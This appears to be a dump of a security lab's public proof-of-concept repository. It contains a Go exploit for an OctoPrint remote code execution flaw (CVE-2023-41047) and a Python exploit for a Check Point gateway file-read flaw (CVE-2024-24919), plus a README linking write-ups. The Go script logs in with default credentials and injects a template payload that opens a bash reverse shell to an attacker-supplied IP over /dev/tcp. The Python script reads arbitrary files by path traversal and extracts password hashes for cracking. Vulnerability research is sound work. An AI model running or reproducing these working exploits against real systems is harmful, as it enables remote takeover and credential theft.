| CloseHandle(hWrite); 584 | 585 | } 586 | -------------------------------------------------------------------------------- /CVE-2023-41047/CVE-2023-41047.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/tls" 5 | "fmt" 6 | "log" 7 | "net/http" 8 | "net/url" 9 | "os" 10 | "strings" 11 | "sync" 12 | ) 13 | 14 | var ( 15 | PROXYURL = "" 16 | ) 17 | 18 | const CSRFTOKEN = "ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZUn0tg.OEMZhA3pw-YZTkm7INGV0FBBjZg" 19 | 20 | func getLoginCookie(uri string) string { 21 | uri += "/api/login" 22 | proxy, _ := url.Parse(PROXYURL) 23 | tr := &http.Transport{ 24 | Proxy: http.ProxyURL(proxy), 25 | TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, 26 | } 27 | client := &http.Client{ 28 | Transport: tr, 29 | } 30 | 31 | data := `{"user":"admin","pass":"admin","remember":false}` 32 | 33 | req, err := http.NewRequest("POST", uri, strings.NewReader(data)) 34 | 35 | if err != nil { 36 | log.Println("Error creating request:", err) 37 | } 38 | 39 | req.Header.Set("Content-Type", "application/json; charset=UTF-8") 40 | //req.Header.Set("X-CSRF-Token", CSRFTOKEN) 41 | //req.Header.Set("Cookie", "csrf_token_P5000="+CSRFTOKEN) 42 | 43 | resp, err := client.Do(req) 44 | 45 | if err != nil { 46 | log.Println("Error making request:", err) 47 | } 48 | 49 | defer resp.Body.Close() 50 | 51 | if resp.StatusCode != http.StatusOK { 52 | log.Printf("HTTP request failed with status code: %d\n", resp.StatusCode) 53 | } 54 | 55 | cookies := resp.Cookies() 56 | if len(cookies) == 0 { 57 | log.Println("No cookies found in the response.") 58 | } 59 | 60 | cookieStr := "" 61 | 62 | for _, cookie := range cookies { 63 | if cookie.Name == "session_P5000" { 64 | cookieStr = "csrf_token_P5000= " + CSRFTOKEN + ";" + cookie.Name + "=" + cookie.Value 65 | } 66 | //log.Printf("Name: %s, Value: %s\n", cookie.Name, cookie.Value) 67 | } 68 | 69 | return cookieStr 70 | } 71 | 72 | func setRequest(uri string, cookie string, payload string, types int, wg *sync.WaitGroup) { 73 | defer wg.Done() 74 | if types == 0 { 75 | uri += "/api/settings" 76 | } else if types == 1 { 77 | uri += "/api/connection" 78 | } 79 | 80 | proxy, _ := url.Parse(PROXYURL) 81 | tr := &http.Transport{ 82 | Proxy: http.ProxyURL(proxy), 83 | TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, 84 | } 85 | client := &http.Client{ 86 | Transport: tr, 87 | } 88 | 89 | req, err := http.NewRequest("POST", uri, strings.NewReader(payload)) 90 | 91 | if err != nil { 92 | log.Println("Error creating request:", err) 93 | } 94 | 95 | req.Header.Set("Content-Type", "application/json") 96 | req.Header.Set("X-CSRF-Token", CSRFTOKEN) 97 | req.Header.Set("Cookie", cookie) 98 | 99 | _, err = client.Do(req) 100 | 101 | if err != nil { 102 | log.Println("Error making request:", err) 103 | } 104 | 105 | //defer resp.Body.Close() 106 | 107 | //log.Println(resp.StatusCode) 108 | } 109 | 110 | func main() { 111 | 112 | if len(os.Args) <= 4 { 113 | fmt.Println("Usage: ./CVE-2023-41047 ") 114 | return 115 | } 116 | 117 | uri := os.Args[1] 118 | PROXYURL = os.Args[2] 119 | reverseIP := os.Args[3] 120 | reversePort := os.Args[4] 121 | 122 | cookie := getLoginCookie(uri) 123 | 124 | var wg sync.WaitGroup 125 | wg.Add(1) 126 | 127 | log.Println("[*] Start...") 128 | // Turn on virtual printer 129 | payload := `{"plugins":{"virtual_printer":{"enabled":true}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}` 130 | go setRequest(uri, cookie, payload, 0, &wg) 131 | log.Println("[+] Step 1 finish...") 132 | // Set evil gcode 133 | payload = `{"scripts":{"gcode":{"afterPrinterConnected":"{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('bash -c \\\"bash -i >&/dev/tcp/` + reverseIP + `/` + reversePort + ` 0>&1\\\"').read()\") }} {% endif %} {% endfor %}"}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}` 134 | go setRequest(uri, cookie, payload, 0, &wg) 135 | log.Println("[+] Step 2 finish...") 136 | 137 | payload = `{"port":"AUTO","baudrate":0,"printerProfile":"_default","autoconnect":false,"command":"connect"}` 138 | go setRequest(uri, cookie, payload, 1, &wg) 139 | log.Printf("[+] Step 3 reverse: tcp://%s:%s", reverseIP, reversePort) 140 | payload = `{"command":"disconnect"}` 141 | go setRequest(uri, cookie, payload, 1, &wg) 142 | 143 | wg.Wait() 144 | } 145 | -------------------------------------------------------------------------------- /CVE-2024-24919/exp.py: -------------------------------------------------------------------------------- 1 | 2 | import argparse 3 | import requests 4 | from urllib3.exceptions import InsecureRequestWarning 5 | import re 6 | import argparse 7 | 8 | 9 | requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) 10 | 11 | 12 | def parse_bin_data(bin_data): 13 | 14 | internal_password_pattern = re.compile(rb":internal_passw.{3}ord \(([^)]+)\)", re.DOTALL) 15 | internal_password_matches = list(internal_password_pattern.finditer(bin_data)) 16 | results = [] 17 | 18 | for match in internal_password_matches: 19 | internal_password = match.group(1).decode('utf-8', errors='ignore').strip() 20 | 21 | if internal_password: 22 | preceding_text = bin_data[:match.start()] 23 | name_pattern = re.compile(rb":name \(([^)]+)\)", re.DOTALL) 24 | name_matches = list(name_pattern.finditer(preceding_text)) 25 | 26 | if name_matches: 27 | name = name_matches[-1].group(1).decode('utf-8', errors='ignore').strip() 28 | 29 | results.append({ 30 | 'name': name, 31 | 'internal_password': internal_password 32 | }) 33 | return results 34 | 35 | def fget(url,filename): 36 | 37 | session = requests.Session() 38 | 39 | rawBody = "/CSHELL/../../../../../../../{}".format(filename) 40 | headers = {"Sec-Ch-Ua":"\"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"","Accept":"*/*","Sec-Ch-Ua-Platform":"\"macOS\"","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36","Referer":"https://192.168.161.110/sslvpnc/Portal/Main","Connection":"keep-alive","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"script","Accept-Encoding":"gzip, deflate, br","Accept-Language":"zh-CN,zh;q=0.9","Sec-Ch-Ua-Mobile":"?0","Sec-Fetch-Mode":"no-cors"} 41 | response = session.get("{}/clients/MyCRL".format(url), data=rawBody, headers=headers,verify=False) 42 | 43 | s_filename = filename.split("/")[-1] 44 | if int(response.status_code)==200: 45 | print('[+] The vulnerability exists, and the file will be saved locally.') 46 | with open(s_filename, 'wb') as file: 47 | file.write(response.content) 48 | if "fwauth.NDB" in filename: 49 | result = parse_bin_data(response.content) 50 | 51 | print("[!] You can use hashcat for brute-forcing.") 52 | print("[!] The type of hash is DES(Unix).") 53 | for entry in result: 54 | print("[+] " + f"Username: {entry['name']}, Password_Hash: {entry['internal_password']}") 55 | else: 56 | print('[!] The target is inappropriate.') 57 | exit() 58 | 59 | parser = argparse.ArgumentParser() 60 | 61 | parser.add_argument(dest = "url") 62 | parser.add_argument(dest = "filename") 63 | 64 | args = parser.parse_args() 65 | 66 | 67 | fget(args.url,args.filename) 68 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | ## The PoC/Exploit of some interesting vulnerabilities 3 | ### Author: Vulnerability Research Team of Numen Cyber Labs 4 | --- 5 | 6 | 1. TCP/IP RCE Vulnerability (CVE-2022–34718) PoC Restoration and Analysis 7 | https://medium.com/@numencyberlabs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf 8 | 9 | 2. CVE-2022–36537 Vulnerability Technical Analysis with Exploit 10 | https://medium.com/@numencyberlabs/cve-2022-36537-vulnerability-technical-analysis-with-exp-667401766746 11 | 12 | 3. CVE-2021-38003:From Leaking TheHole to Chrome Renderer RCE 13 | https://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078 14 | 15 | 4. CVE-2022–42889:Text4Shell Vulnerability Technical Analysis 16 | https://medium.com/@numencyberlabs/text4shell-or-act4shell-vulnerability-analysis-a860d141e3e5 17 | 18 | 5. Zero Day Vulnerability: Chromium v8 js engine issue 1303458 — Use After Free in x64 Instruction Optimization Vulnerability Analysis 19 | https://medium.com/bugbountywriteup/zero-day-vulnerability-chromium-v8-js-engine-issue-1303458-use-after-free-in-x64-instruction-e874419436a6 20 | 21 | 6. CVE-2022-3723: based on google's public poc 22 | https://medium.com/@numencyberlabs/use-native-pointer-of-function-to-bypass-the-latest-chrome-v8-sandbox-exp-of-issue1378239-251d9c5b0d14 23 | 24 | 7. CVE-2023-41047: OctoPrint Remote Code Execution Vulnerability 25 | 26 | https://medium.com/@numencyberlabs/octoprint-remote-code-execution-vulnerability-7e36372d6c2b 27 | 28 | 8. CVE-2024-24919: Check Point Security Gateways_Arbitrary File Read Vulnerability 29 | https://medium.com/@numencyberlabs/cve-2024-24919-check-point-security-gateways-arbitrary-file-read-vulnerability-f33b296be408 30 | --- 31 | ## The Analysis of Web3-related vulnerabilities 32 | ### Discovered by Numen Web3 security products 33 | ### Author: Web3 Security Team of Numen Cyber Labs 34 | --- 35 | 36 | 1. Analysis of the First Critical Vulnerability of Aptos Move VM 37 | https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e 38 | 39 | 2. The Story of a High-Risk Vulnerability in Move Reference Safety Verify Module 40 | https://medium.com/numen-cyber-labs/the-story-of-a-high-vulnerability-in-move-reference-safety-verify-module-2340f3d8c642 41 | 42 | --------------------------------------------------------------------------------